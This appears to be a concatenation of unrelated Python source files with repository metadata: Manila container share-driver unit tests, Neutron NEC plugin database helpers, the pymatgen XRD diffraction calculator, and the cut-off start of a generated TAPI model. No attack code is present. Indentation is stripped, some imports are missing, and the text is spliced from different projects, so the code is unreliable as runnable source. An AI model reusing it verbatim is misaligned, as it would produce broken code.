from oslo_config import cfg
from manila.common import constants as const
from manila import context
from manila import exception
from manila.share import configuration
from manila.share.drivers.container import driver
from manila.share.drivers.container import protocol_helper
from manila import test
from manila.tests import fake_utils
from manila.tests.share.drivers.container import fakes as cont_fakes
CONF = cfg.CONF
CONF.import_opt('lvm_share_export_ip', 'manila.share.drivers.lvm')
@ddt.ddt
class ContainerShareDriverTestCase(test.TestCase):
"""Tests ContainerShareDriver"""
def setUp(self):
super(ContainerShareDriverTestCase, self).setUp()
fake_utils.stub_out_utils_execute(self)
self._context = context.get_admin_context()
self._db = mock.Mock()
self.fake_conf = configuration.Configuration(None)
CONF.set_default('driver_handles_share_servers', True)
self._driver = driver.ContainerShareDriver(
configuration=self.fake_conf)
self.share = cont_fakes.fake_share()
self.access = cont_fakes.fake_access()
self.server = {
'public_address': self.fake_conf.lvm_share_export_ip,
'instance_id': 'LVM',
}
# Used only to test compatibility with share manager
self.share_server = "fake_share_server"
def fake_exec_sync(self, *args, **kwargs):
kwargs['execute_arguments'].append(args)
try:
ret_val = kwargs['ret_val']
except KeyError:
ret_val = None
return ret_val
def test__get_helper_ok(self):
share = cont_fakes.fake_share(share_proto='CIFS')
expected = protocol_helper.DockerCIFSHelper(None)
actual = self._driver._get_helper(share)
self.assertEqual(type(expected), type(actual))
def test__get_helper_existing_ok(self):
share = cont_fakes.fake_share(share_proto='CIFS')
expected = protocol_helper.DockerCIFSHelper
self._driver._helpers = {'CIFS': expected}
actual = self._driver._get_helper(share)
self.assertEqual(expected, type(actual))
def test__get_helper_not_ok(self):
share = cont_fakes.fake_share()
self.assertRaises(exception.InvalidShare, self._driver._get_helper,
share)
def test_update_share_stats(self):
self.mock_object(self._driver.storage, 'get_share_server_pools',
mock.Mock(return_value='test-pool'))
self._driver._update_share_stats()
self.assertEqual('Docker', self._driver._stats['share_backend_name'])
self.assertEqual('CIFS', self._driver._stats['storage_protocol'])
self.assertEqual(0, self._driver._stats['reserved_percentage'])
self.assertIsNone(self._driver._stats['consistency_group_support'])
self.assertEqual(False, self._driver._stats['snapshot_support'])
self.assertEqual('ContainerShareDriver',
self._driver._stats['driver_name'])
self.assertEqual('test-pool', self._driver._stats['pools'])
def test_create_share(self):
helper = mock.Mock()
self.mock_object(helper, 'create_share',
mock.Mock(return_value='export_location'))
self.mock_object(self._driver, "_get_helper",
mock.Mock(return_value=helper))
self.mock_object(self._driver.storage, 'provide_storage')
self.mock_object(self._driver.container, 'execute')
self.assertEqual('export_location',
self._driver.create_share(self._context, self.share,
{'id': 'fake'}))
def test_delete_share_ok(self):
helper = mock.Mock()
self.mock_object(self._driver, "_get_helper",
mock.Mock(return_value=helper))
self.mock_object(self._driver.container, 'execute')
self.mock_object(self._driver.storage, 'remove_storage')
self._driver.delete_share(self._context, self.share, {'id': 'fake'})
self._driver.container.execute.assert_called_with(
'manila_fake',
['rm', '-fR', '/shares/fakeshareid']
)
def test_delete_share_rm_fails(self):
def fake_execute(*args):
if 'rm' in args[1]:
raise exception.ProcessExecutionError()
self.mock_object(driver.LOG, "warning")
self.mock_object(self._driver, "_get_helper")
self.mock_object(self._driver.container, "execute", fake_execute)
self.mock_object(self._driver.storage, 'remove_storage')
self._driver.delete_share(self._context, self.share, {'id': 'fake'})
self.assertTrue(driver.LOG.warning.called)
def test_extend_share(self):
share = cont_fakes.fake_share()
actual_arguments = []
expected_arguments = [
('manila_fake_server', ['umount', '/shares/fakeshareid']),
('manila_fake_server',
['mount', '/dev/manila_docker_volumes/fakeshareid',
'/shares/fakeshareid'])
]
self.mock_object(self._driver.storage, "extend_share")
self._driver.container.execute = functools.partial(
self.fake_exec_sync, execute_arguments=actual_arguments,
ret_val='')
self._driver.extend_share(share, 2, {'id': 'fake-server'})
self.assertEqual(expected_arguments, actual_arguments)
def test_ensure_share(self):
# Does effectively nothing by design.
self.assertEqual(1, 1)
def test_update_access_access_rules_ok(self):
helper = mock.Mock()
self.mock_object(self._driver, "_get_helper",
mock.Mock(return_value=helper))
self._driver.update_access(self._context, self.share,
[{'access_level': const.ACCESS_LEVEL_RW}],
[], [], {"id": "fake"})
helper.update_access.assert_called_with('manila_fake',
[{'access_level': 'rw'}],
[], [])
def test_get_network_allocation_numer(self):
# Does effectively nothing by design.
self.assertEqual(1, self._driver.get_network_allocations_number())
def test__get_container_name(self):
self.assertEqual("manila_fake_server",
self._driver._get_container_name("fake-server"))
def test_do_setup(self):
# Does effectively nothing by design.
self.assertEqual(1, 1)
def test_check_for_setup_error_host_not_ok_class_ok(self):
setattr(self._driver.configuration.local_conf,
'neutron_host_id', None)
self.assertRaises(exception.ManilaException,
self._driver.check_for_setup_error)
def test_check_for_setup_error_host_not_ok_class_some_other(self):
setattr(self._driver.configuration.local_conf,
'neutron_host_id', None)
setattr(self._driver.configuration.local_conf,
'network_api_class',
'manila.share.drivers.container.driver.ContainerShareDriver')
self.mock_object(driver.LOG, "warning")
self._driver.check_for_setup_error()
setattr(self._driver.configuration.local_conf,
'network_api_class',
'manila.network.neutron.neutron_network_plugin.'
'NeutronNetworkPlugin')
self.assertTrue(driver.LOG.warning.called)
def test__connect_to_network(self):
network_info = cont_fakes.fake_network()
helper = mock.Mock()
self.mock_object(self._driver, "_execute",
mock.Mock(return_value=helper))
self.mock_object(self._driver.container, "execute")
self._driver._connect_to_network("fake-server", network_info,
"fake-veth")
@ddt.data(['veth0000000'], ['veth0000000' * 2])
def test__teardown_server(self, list_of_veths):
def fake_ovs_execute(*args, **kwargs):
kwargs['arguments'].append(args)
if len(args) == 3:
return list_of_veths
elif len(args) == 4:
return ('fake:manila_b5afb5c1_6011_43c4_8a37_29820e6951a7', '')
else:
return 0
actual_arguments = []
expected_arguments = [
('ovs-vsctl', 'list', 'interface'),
('ovs-vsctl', 'list', 'interface', 'veth0000000'),
('ovs-vsctl', '--', 'del-port', 'br-int', 'veth0000000')
]
self.mock_object(self._driver.container, "stop_container", mock.Mock())
self._driver._execute = functools.partial(
fake_ovs_execute, arguments=actual_arguments)
self._driver._teardown_server(
server_details={"id": "b5afb5c1-6011-43c4-8a37-29820e6951a7"})
self.assertEqual(expected_arguments.sort(), actual_arguments.sort())
@ddt.data(['veth0000000'], ['veth0000000' * 2])
def test__teardown_server_veth_disappeared_mysteriously(self,
list_of_veths):
def fake_ovs_execute(*args, **kwargs):
if len(args) == 3:
return list_of_veths
if len(args) == 4:
return ('fake:manila_b5afb5c1_6011_43c4_8a37_29820e6951a7', '')
if 'del-port' in args:
raise exception.ProcessExecutionError()
else:
return 0
self.mock_object(driver.LOG, "warning")
self.mock_object(self._driver, "_execute", fake_ovs_execute)
self._driver._teardown_server(
server_details={"id": "b5afb5c1-6011-43c4-8a37-29820e6951a7"})
self.assertTrue(driver.LOG.warning.called)
@ddt.data(['veth0000000'], ['veth0000000' * 2])
def test__teardown_server_check_continuation(self, list_of_veths):
def fake_ovs_execute(*args, **kwargs):
kwargs['arguments'].append(args)
if len(args) == 3:
return list_of_veths
elif len(args) == 4:
return ('fake:', '')
else:
return 0
actual_arguments = []
expected_arguments = [
('ovs-vsctl', 'list', 'interface'),
('ovs-vsctl', 'list', 'interface', 'veth0000000'),
('ovs-vsctl', '--', 'del-port', 'br-int', 'veth0000000')
]
self.mock_object(self._driver.container, "stop_container", mock.Mock())
self._driver._execute = functools.partial(
fake_ovs_execute, arguments=actual_arguments)
self._driver._teardown_server(
server_details={"id": "b5afb5c1-6011-43c4-8a37-29820e6951a7"})
self.assertEqual(expected_arguments.sort(), actual_arguments.sort())
def test__get_veth_state(self):
retval = ('veth0000000\n', '')
self.mock_object(self._driver, "_execute",
mock.Mock(return_value=retval))
result = self._driver._get_veth_state()
self.assertEqual(['veth0000000'], result)
def test__get_corresponding_veth_ok(self):
before = ['veth0000000']
after = ['veth0000000', 'veth0000001']
result = self._driver._get_corresponding_veth(before, after)
self.assertEqual('veth0000001', result)
def test__get_corresponding_veth_raises(self):
before = ['veth0000000']
after = ['veth0000000', 'veth0000001', 'veth0000002']
self.assertRaises(exception.ManilaException,
self._driver._get_corresponding_veth,
before, after)
def test__setup_server_container_fails(self):
network_info = cont_fakes.fake_network()
self.mock_object(self._driver.container, 'start_container')
self._driver.container.start_container.side_effect = KeyError()
self.assertRaises(exception.ManilaException,
self._driver._setup_server, network_info)
def test__setup_server_ok(self):
network_info = cont_fakes.fake_network()
server_id = self._driver._get_container_name(network_info["server_id"])
self.mock_object(self._driver.container, 'start_container')
self.mock_object(self._driver, '_get_veth_state')
self.mock_object(self._driver, '_get_corresponding_veth',
mock.Mock(return_value='veth0'))
self.mock_object(self._driver, '_connect_to_network')
self.assertEqual(network_info['server_id'],
self._driver._setup_server(network_info)['id'])
self._driver.container.start_container.assert_called_once_with(
server_id)
self._driver._connect_to_network.assert_called_once_with(server_id,
network_info,
'veth0')
| {
"content_hash": "e4ad3a83e9cc53cf78c64c2e1dc9c0b1",
"timestamp": "",
"source": "github",
"line_count": 334,
"max_line_length": 79,
"avg_line_length": 39.31137724550898,
"alnum_prop": 0.5852246763137853,
"repo_name": "vponomaryov/manila",
"id": "57877ff028ded9624daad0a9d1e6d02414570b25",
"size": "13759",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "manila/tests/share/drivers/container/test_driver.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "953"
},
{
"name": "Python",
"bytes": "9697997"
},
{
"name": "Shell",
"bytes": "103800"
}
],
"symlink_target": ""
} |
import sqlalchemy as sa
from neutron.db import api as db
from neutron.db import model_base
from neutron.db import models_v2
from neutron.db import securitygroups_db as sg_db
from neutron.extensions import securitygroup as ext_sg
from neutron import manager
from neutron.openstack.common import log as logging
from neutron.plugins.nec.common import config # noqa
from neutron.plugins.nec.common import exceptions as nexc
from neutron.plugins.nec.db import models as nmodels
LOG = logging.getLogger(__name__)
OFP_VLAN_NONE = 0xffff
resource_map = {'ofc_tenant': nmodels.OFCTenantMapping,
'ofc_network': nmodels.OFCNetworkMapping,
'ofc_port': nmodels.OFCPortMapping,
'ofc_router': nmodels.OFCRouterMapping,
'ofc_packet_filter': nmodels.OFCFilterMapping}
old_resource_map = {'ofc_tenant': nmodels.OFCTenant,
'ofc_network': nmodels.OFCNetwork,
'ofc_port': nmodels.OFCPort,
'ofc_packet_filter': nmodels.OFCFilter}
# utitlity methods
def _get_resource_model(resource, old_style):
if old_style:
# NOTE: Some new resources are not defined in old_resource_map.
# In such case None is returned.
return old_resource_map.get(resource)
else:
return resource_map[resource]
def initialize():
db.configure_db()
def clear_db(base=model_base.BASEV2):
db.clear_db(base)
def get_ofc_item(session, resource, neutron_id, old_style=False):
model = _get_resource_model(resource, old_style)
if not model:
return None
try:
return session.query(model).filter_by(quantum_id=neutron_id).one()
except sa.orm.exc.NoResultFound:
return None
def get_ofc_id(session, resource, neutron_id, old_style=False):
ofc_item = get_ofc_item(session, resource, neutron_id, old_style)
if ofc_item:
if old_style:
return ofc_item.id
else:
return ofc_item.ofc_id
else:
return None
def exists_ofc_item(session, resource, neutron_id, old_style=False):
if get_ofc_item(session, resource, neutron_id, old_style):
return True
else:
return False
def find_ofc_item(session, resource, ofc_id, old_style=False):
try:
model = _get_resource_model(resource, old_style)
if old_style:
params = dict(id=ofc_id)
else:
params = dict(ofc_id=ofc_id)
return (session.query(model).filter_by(**params).one())
except sa.orm.exc.NoResultFound:
return None
def add_ofc_item(session, resource, neutron_id, ofc_id, old_style=False):
try:
model = _get_resource_model(resource, old_style)
if old_style:
params = dict(quantum_id=neutron_id, id=ofc_id)
else:
params = dict(quantum_id=neutron_id, ofc_id=ofc_id)
item = model(**params)
with session.begin(subtransactions=True):
session.add(item)
session.flush()
except Exception as exc:
LOG.exception(exc)
raise nexc.NECDBException(reason=exc.message)
return item
def del_ofc_item(session, resource, neutron_id, old_style=False,
warning=True):
try:
model = _get_resource_model(resource, old_style)
with session.begin(subtransactions=True):
item = session.query(model).filter_by(quantum_id=neutron_id).one()
session.delete(item)
return True
except sa.orm.exc.NoResultFound:
if warning:
LOG.warning(_("_del_ofc_item(): NotFound item "
"(model=%(model)s, id=%(id)s) "),
{'model': model, 'id': neutron_id})
return False
def get_ofc_id_lookup_both(session, resource, neutron_id):
ofc_id = get_ofc_id(session, resource, neutron_id)
# Lookup old style of OFC mapping table
if not ofc_id:
ofc_id = get_ofc_id(session, resource, neutron_id,
old_style=True)
if not ofc_id:
reason = (_("NotFound %(resource)s for neutron_id=%(id)s.")
% {'resource': resource, 'id': neutron_id})
raise nexc.OFCConsistencyBroken(reason=reason)
return ofc_id
def exists_ofc_item_lookup_both(session, resource, neutron_id):
if exists_ofc_item(session, resource, neutron_id):
return True
# Check old style of OFC mapping table
if exists_ofc_item(session, resource, neutron_id,
old_style=True):
return True
return False
def del_ofc_item_lookup_both(session, resource, neutron_id):
# Delete the mapping from new style of OFC mapping table
if del_ofc_item(session, resource, neutron_id,
old_style=False, warning=False):
return
# Delete old style of OFC mapping table
if del_ofc_item(session, resource, neutron_id,
old_style=True, warning=False):
return
# The specified resource not found
LOG.warning(_("_del_ofc_item(): NotFound item "
"(resource=%(resource)s, id=%(id)s) "),
{'resource': resource, 'id': neutron_id})
def get_portinfo(session, id):
try:
return (session.query(nmodels.PortInfo).
filter_by(id=id).
one())
except sa.orm.exc.NoResultFound:
return None
def add_portinfo(session, id, datapath_id='', port_no=0,
vlan_id=OFP_VLAN_NONE, mac=''):
try:
portinfo = nmodels.PortInfo(id=id, datapath_id=datapath_id,
port_no=port_no, vlan_id=vlan_id, mac=mac)
with session.begin(subtransactions=True):
session.add(portinfo)
except Exception as exc:
LOG.exception(exc)
raise nexc.NECDBException(reason=exc.message)
return portinfo
def del_portinfo(session, id):
try:
with session.begin(subtransactions=True):
portinfo = session.query(nmodels.PortInfo).filter_by(id=id).one()
session.delete(portinfo)
except sa.orm.exc.NoResultFound:
LOG.warning(_("del_portinfo(): NotFound portinfo for "
"port_id: %s"), id)
def get_port_from_device(port_id):
"""Get port from database."""
LOG.debug(_("get_port_with_securitygroups() called:port_id=%s"), port_id)
session = db.get_session()
sg_binding_port = sg_db.SecurityGroupPortBinding.port_id
query = session.query(models_v2.Port,
sg_db.SecurityGroupPortBinding.security_group_id)
query = query.outerjoin(sg_db.SecurityGroupPortBinding,
models_v2.Port.id == sg_binding_port)
query = query.filter(models_v2.Port.id == port_id)
port_and_sgs = query.all()
if not port_and_sgs:
return None
port = port_and_sgs[0][0]
plugin = manager.NeutronManager.get_plugin()
port_dict = plugin._make_port_dict(port)
port_dict[ext_sg.SECURITYGROUPS] = [
sg_id for port_, sg_id in port_and_sgs if sg_id]
port_dict['security_group_rules'] = []
port_dict['security_group_source_groups'] = []
port_dict['fixed_ips'] = [ip['ip_address']
for ip in port['fixed_ips']]
return port_dict
| {
"content_hash": "c728d8da8ce22685ae332637e8ceffd9",
"timestamp": "",
"source": "github",
"line_count": 216,
"max_line_length": 78,
"avg_line_length": 33.64351851851852,
"alnum_prop": 0.6157974404843815,
"repo_name": "kaiweifan/neutron",
"id": "e606861ff2247cdb9298fb66b587cd6c247c4c19",
"size": "7966",
"binary": false,
"copies": "9",
"ref": "refs/heads/vip5",
"path": "neutron/plugins/nec/db/api.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "37307"
},
{
"name": "JavaScript",
"bytes": "67928"
},
{
"name": "Python",
"bytes": "6886068"
},
{
"name": "Shell",
"bytes": "8983"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
} |
from __future__ import division, unicode_literals
from math import sin, cos, asin, pi, degrees, radians
import os
import collections
import numpy as np
import json
from pymatgen.core.spectrum import Spectrum
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.util.plotting import add_fig_kwargs
"""
This module implements an XRD pattern calculator.
"""
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "[email protected]"
__date__ = "5/22/14"
# XRD wavelengths in angstroms
WAVELENGTHS = {
"CuKa": 1.54184,
"CuKa2": 1.54439,
"CuKa1": 1.54056,
"CuKb1": 1.39222,
"MoKa": 0.71073,
"MoKa2": 0.71359,
"MoKa1": 0.70930,
"MoKb1": 0.63229,
"CrKa": 2.29100,
"CrKa2": 2.29361,
"CrKa1": 2.28970,
"CrKb1": 2.08487,
"FeKa": 1.93735,
"FeKa2": 1.93998,
"FeKa1": 1.93604,
"FeKb1": 1.75661,
"CoKa": 1.79026,
"CoKa2": 1.79285,
"CoKa1": 1.78896,
"CoKb1": 1.63079,
"AgKa": 0.560885,
"AgKa2": 0.563813,
"AgKa1": 0.559421,
"AgKb1": 0.497082,
}
with open(os.path.join(os.path.dirname(__file__),
"atomic_scattering_params.json")) as f:
ATOMIC_SCATTERING_PARAMS = json.load(f)
class XRDPattern(Spectrum):
"""
A representation of an XRDPattern
"""
XLABEL = "$2\\Theta$"
YLABEL = "Intensity"
def __init__(self, x, y, hkls, d_hkls):
"""
Args:
x: Two theta angles.
y: Intensities
hkls: [{(h, k, l): mult}] {(h, k, l): mult} is a dict of Miller
indices for all diffracted lattice facets contributing to each
intensity.
d_hkls: List of interplanar spacings.
"""
super(XRDPattern, self).__init__(x, y, hkls,d_hkls)
self.hkls = hkls
self.d_hkls = d_hkls
class XRDCalculator(object):
"""
Computes the XRD pattern of a crystal structure.
This code is implemented by Shyue Ping Ong as part of UCSD's NANO106 -
Crystallography of Materials. The formalism for this code is based on
that given in Chapters 11 and 12 of Structure of Materials by Marc De
Graef and Michael E. McHenry. This takes into account the atomic
scattering factors and the Lorentz polarization factor, but not
the Debye-Waller (temperature) factor (for which data is typically not
available). Note that the multiplicity correction is not needed since
this code simply goes through all reciprocal points within the limiting
sphere, which includes all symmetrically equivalent facets. The algorithm
is as follows
1. Calculate reciprocal lattice of structure. Find all reciprocal points
within the limiting sphere given by :math:`\\frac{2}{\\lambda}`.
2. For each reciprocal point :math:`\\mathbf{g_{hkl}}` corresponding to
lattice plane :math:`(hkl)`, compute the Bragg condition
:math:`\\sin(\\theta) = \\frac{\\lambda}{2d_{hkl}}`
3. Compute the structure factor as the sum of the atomic scattering
factors. The atomic scattering factors are given by
.. math::
f(s) = Z - 41.78214 \\times s^2 \\times \\sum\\limits_{i=1}^n a_i \
\\exp(-b_is^2)
where :math:`s = \\frac{\\sin(\\theta)}{\\lambda}` and :math:`a_i`
and :math:`b_i` are the fitted parameters for each element. The
structure factor is then given by
.. math::
F_{hkl} = \\sum\\limits_{j=1}^N f_j \\exp(2\\pi i \\mathbf{g_{hkl}}
\\cdot \\mathbf{r})
4. The intensity is then given by the modulus square of the structure
factor.
.. math::
I_{hkl} = F_{hkl}F_{hkl}^*
5. Finally, the Lorentz polarization correction factor is applied. This
factor is given by:
.. math::
P(\\theta) = \\frac{1 + \\cos^2(2\\theta)}
{\\sin^2(\\theta)\\cos(\\theta)}
"""
# Tuple of available radiation keywords.
AVAILABLE_RADIATION = tuple(WAVELENGTHS.keys())
# Tolerance in which to treat two peaks as having the same two theta.
TWO_THETA_TOL = 1e-5
# Tolerance in which to treat a peak as effectively 0 if the scaled
# intensity is less than this number. Since the max intensity is 100,
# this means the peak must be less than 1e-5 of the peak intensity to be
# considered as zero. This deals with numerical issues where systematic
# absences do not cancel exactly to zero.
SCALED_INTENSITY_TOL = 1e-3
def __init__(self, wavelength="CuKa", symprec=0, debye_waller_factors=None):
"""
Initializes the XRD calculator with a given radiation.
Args:
wavelength (str/float): The wavelength can be specified as either a
float or a string. If it is a string, it must be one of the
supported definitions in the AVAILABLE_RADIATION class
variable, which provides useful commonly used wavelengths.
If it is a float, it is interpreted as a wavelength in
angstroms. Defaults to "CuKa", i.e, Cu K_alpha radiation.
symprec (float): Symmetry precision for structure refinement. If
set to 0, no refinement is done. Otherwise, refinement is
performed using spglib with provided precision.
debye_waller_factors ({element symbol: float}): Allows the
specification of Debye-Waller factors. Note that these
factors are temperature dependent.
"""
if isinstance(wavelength, float):
self.wavelength = wavelength
else:
self.radiation = wavelength
self.wavelength = WAVELENGTHS[wavelength]
self.symprec = symprec
self.debye_waller_factors = debye_waller_factors or {}
def get_xrd_pattern(self, structure, scaled=True, two_theta_range=(0, 90)):
"""
Calculates the XRD pattern for a structure.
Args:
structure (Structure): Input structure
scaled (bool): Whether to return scaled intensities. The maximum
peak is set to a value of 100. Defaults to True. Use False if
you need the absolute values to combine XRD plots.
two_theta_range ([float of length 2]): Tuple for range of
two_thetas to calculate in degrees. Defaults to (0, 90). Set to
None if you want all diffracted beams within the limiting
sphere of radius 2 / wavelength.
Returns:
(XRDPattern)
"""
if self.symprec:
finder = SpacegroupAnalyzer(structure, symprec=self.symprec)
structure = finder.get_refined_structure()
wavelength = self.wavelength
latt = structure.lattice
is_hex = latt.is_hexagonal()
# Obtained from Bragg condition. Note that reciprocal lattice
# vector length is 1 / d_hkl.
min_r, max_r = (0, 2 / wavelength) if two_theta_range is None else \
[2 * sin(radians(t / 2)) / wavelength for t in two_theta_range]
# Obtain crystallographic reciprocal lattice points within range
recip_latt = latt.reciprocal_lattice_crystallographic
recip_pts = recip_latt.get_points_in_sphere(
[[0, 0, 0]], [0, 0, 0], max_r)
if min_r:
recip_pts = [pt for pt in recip_pts if pt[1] >= min_r]
# Create a flattened array of zs, coeffs, fcoords and occus. This is
# used to perform vectorized computation of atomic scattering factors
# later. Note that these are not necessarily the same size as the
# structure as each partially occupied specie occupies its own
# position in the flattened array.
zs = []
coeffs = []
fcoords = []
occus = []
dwfactors = []
for site in structure:
for sp, occu in site.species_and_occu.items():
zs.append(sp.Z)
try:
c = ATOMIC_SCATTERING_PARAMS[sp.symbol]
except KeyError:
raise ValueError("Unable to calculate XRD pattern as "
"there is no scattering coefficients for"
" %s." % sp.symbol)
coeffs.append(c)
dwfactors.append(self.debye_waller_factors.get(sp.symbol, 0))
fcoords.append(site.frac_coords)
occus.append(occu)
zs = np.array(zs)
coeffs = np.array(coeffs)
fcoords = np.array(fcoords)
occus = np.array(occus)
dwfactors = np.array(dwfactors)
peaks = {}
two_thetas = []
for hkl, g_hkl, ind in sorted(
recip_pts, key=lambda i: (i[1], -i[0][0], -i[0][1], -i[0][2])):
# Force miller indices to be integers.
hkl = [int(round(i)) for i in hkl]
if g_hkl != 0:
d_hkl = 1 / g_hkl
# Bragg condition
theta = asin(wavelength * g_hkl / 2)
# s = sin(theta) / wavelength = 1 / 2d = |ghkl| / 2 (d =
# 1/|ghkl|)
s = g_hkl / 2
# Store s^2 since we are using it a few times.
s2 = s ** 2
# Vectorized computation of g.r for all fractional coords and
# hkl.
g_dot_r = np.dot(fcoords, np.transpose([hkl])).T[0]
# Highly vectorized computation of atomic scattering factors.
# Equivalent non-vectorized code is::
#
# for site in structure:
# el = site.specie
# coeff = ATOMIC_SCATTERING_PARAMS[el.symbol]
# fs = el.Z - 41.78214 * s2 * sum(
# [d[0] * exp(-d[1] * s2) for d in coeff])
fs = zs - 41.78214 * s2 * np.sum(
coeffs[:, :, 0] * np.exp(-coeffs[:, :, 1] * s2), axis=1)
dw_correction = np.exp(-dwfactors * s2)
# Structure factor = sum of atomic scattering factors (with
# position factor exp(2j * pi * g.r and occupancies).
# Vectorized computation.
f_hkl = np.sum(fs * occus * np.exp(2j * pi * g_dot_r)
* dw_correction)
# Lorentz polarization correction for hkl
lorentz_factor = (1 + cos(2 * theta) ** 2) / \
(sin(theta) ** 2 * cos(theta))
# Intensity for hkl is modulus square of structure factor.
i_hkl = (f_hkl * f_hkl.conjugate()).real
two_theta = degrees(2 * theta)
if is_hex:
# Use Miller-Bravais indices for hexagonal lattices.
hkl = (hkl[0], hkl[1], - hkl[0] - hkl[1], hkl[2])
# Deal with floating point precision issues.
ind = np.where(np.abs(np.subtract(two_thetas, two_theta)) <
XRDCalculator.TWO_THETA_TOL)
if len(ind[0]) > 0:
peaks[two_thetas[ind[0][0]]][0] += i_hkl * lorentz_factor
peaks[two_thetas[ind[0][0]]][1].append(tuple(hkl))
else:
peaks[two_theta] = [i_hkl * lorentz_factor, [tuple(hkl)],
d_hkl]
two_thetas.append(two_theta)
# Scale intensities so that the max intensity is 100.
max_intensity = max([v[0] for v in peaks.values()])
x = []
y = []
hkls = []
d_hkls = []
for k in sorted(peaks.keys()):
v = peaks[k]
fam = get_unique_families(v[1])
if v[0] / max_intensity * 100 > XRDCalculator.SCALED_INTENSITY_TOL:
x.append(k)
y.append(v[0])
hkls.append(fam)
d_hkls.append(v[2])
xrd = XRDPattern(x, y, hkls, d_hkls)
if scaled:
xrd.normalize(mode="max", value=100)
return xrd
def get_xrd_plot(self, structure, two_theta_range=(0, 90),
annotate_peaks=True, ax=None, with_labels=True,
fontsize=16):
"""
Returns the XRD plot as a matplotlib.pyplot.
Args:
structure: Input structure
two_theta_range ([float of length 2]): Tuple for range of
two_thetas to calculate in degrees. Defaults to (0, 90). Set to
None if you want all diffracted beams within the limiting
sphere of radius 2 / wavelength.
annotate_peaks: Whether to annotate the peaks with plane
information.
ax: matplotlib :class:`Axes` or None if a new figure should be created.
with_labels: True to add xlabels and ylabels to the plot.
fontsize: (int) fontsize for peak labels.
Returns:
(matplotlib.pyplot)
"""
if ax is None:
from pymatgen.util.plotting import pretty_plot
plt = pretty_plot(16, 10)
ax = plt.gca()
else:
# This to maintain the type of the return value.
import matplotlib.pyplot as plt
xrd = self.get_xrd_pattern(structure, two_theta_range=two_theta_range)
for two_theta, i, hkls, d_hkl in zip(xrd.x, xrd.y, xrd.hkls, xrd.d_hkls):
if two_theta_range[0] <= two_theta <= two_theta_range[1]:
label = ", ".join([str(hkl) for hkl in hkls.keys()])
ax.plot([two_theta, two_theta], [0, i], color='k',
linewidth=3, label=label)
if annotate_peaks:
ax.annotate(label, xy=[two_theta, i],
xytext=[two_theta, i], fontsize=fontsize)
if with_labels:
ax.set_xlabel(r"$2\theta$ ($^\circ$)")
ax.set_ylabel("Intensities (scaled)")
if hasattr(ax, "tight_layout"):
ax.tight_layout()
return plt
def show_xrd_plot(self, structure, two_theta_range=(0, 90),
annotate_peaks=True):
"""
Shows the XRD plot.
Args:
structure (Structure): Input structure
two_theta_range ([float of length 2]): Tuple for range of
two_thetas to calculate in degrees. Defaults to (0, 90). Set to
None if you want all diffracted beams within the limiting
sphere of radius 2 / wavelength.
annotate_peaks (bool): Whether to annotate the peaks with plane
information.
"""
self.get_xrd_plot(structure, two_theta_range=two_theta_range,
annotate_peaks=annotate_peaks).show()
@add_fig_kwargs
def plot_structures(self, structures, two_theta_range=(0, 90),
annotate_peaks=True, fontsize=6, **kwargs):
"""
Plot XRD for multiple structures on the same figure.
Args:
structures (Structure): List of structures
two_theta_range ([float of length 2]): Tuple for range of
two_thetas to calculate in degrees. Defaults to (0, 90). Set to
None if you want all diffracted beams within the limiting
sphere of radius 2 / wavelength.
annotate_peaks (bool): Whether to annotate the peaks with plane
information.
fontsize: (int) fontsize for peak labels.
"""
import matplotlib.pyplot as plt
nrows = len(structures)
fig, axes = plt.subplots(nrows=nrows, ncols=1, sharex=True, squeeze=False)
for i, (ax, structure) in enumerate(zip(axes.ravel(), structures)):
self.get_xrd_plot(structure, two_theta_range=two_theta_range,
annotate_peaks=annotate_peaks,
fontsize=fontsize, ax=ax, with_labels=i == nrows - 1)
spg_symbol, spg_number = structure.get_space_group_info()
ax.set_title("{} {} ({}) ".format(structure.formula, spg_symbol, spg_number))
return fig
def get_unique_families(hkls):
"""
Returns unique families of Miller indices. Families must be permutations
of each other.
Args:
hkls ([h, k, l]): List of Miller indices.
Returns:
{hkl: multiplicity}: A dict with unique hkl and multiplicity.
"""
# TODO: Definitely can be sped up.
def is_perm(hkl1, hkl2):
h1 = np.abs(hkl1)
h2 = np.abs(hkl2)
return all([i == j for i, j in zip(sorted(h1), sorted(h2))])
unique = collections.defaultdict(list)
for hkl1 in hkls:
found = False
for hkl2 in unique.keys():
if is_perm(hkl1, hkl2):
found = True
unique[hkl2].append(hkl1)
break
if not found:
unique[hkl1].append(hkl1)
pretty_unique = {}
for k, v in unique.items():
pretty_unique[sorted(v)[-1]] = len(v)
return pretty_unique
| {
"content_hash": "b042e4e2e9cd5f8fa3d11fd2bb6de70f",
"timestamp": "",
"source": "github",
"line_count": 457,
"max_line_length": 89,
"avg_line_length": 37.74398249452954,
"alnum_prop": 0.5567859006319207,
"repo_name": "setten/pymatgen",
"id": "08d1188342352f370fdcf877307a5477ded86d9c",
"size": "17359",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "pymatgen/analysis/diffraction/xrd.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "5938"
},
{
"name": "CSS",
"bytes": "7550"
},
{
"name": "Common Lisp",
"bytes": "3029065"
},
{
"name": "HTML",
"bytes": "4886182"
},
{
"name": "Makefile",
"bytes": "5573"
},
{
"name": "Perl",
"bytes": "229104"
},
{
"name": "Propeller Spin",
"bytes": "4026362"
},
{
"name": "Python",
"bytes": "6190353"
},
{
"name": "Roff",
"bytes": "868"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from tapi_server.models.base_model_ import Model
from tapi_server.models.tapi_oam_oam_constraint import TapiOamOamConstraint # noqa: F401,E501
from tapi_server.models.tapi_oam_oam_service_end_point import TapiOamOamServiceEndPoint # noqa: F401,E501
from tapi_server import util
class TapiOamCreateoamserviceInput(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, oam_constraint=None, state=None, end_point=None): # noqa: E501
"""TapiOamCreateoamserviceInput - a model defined in OpenAPI
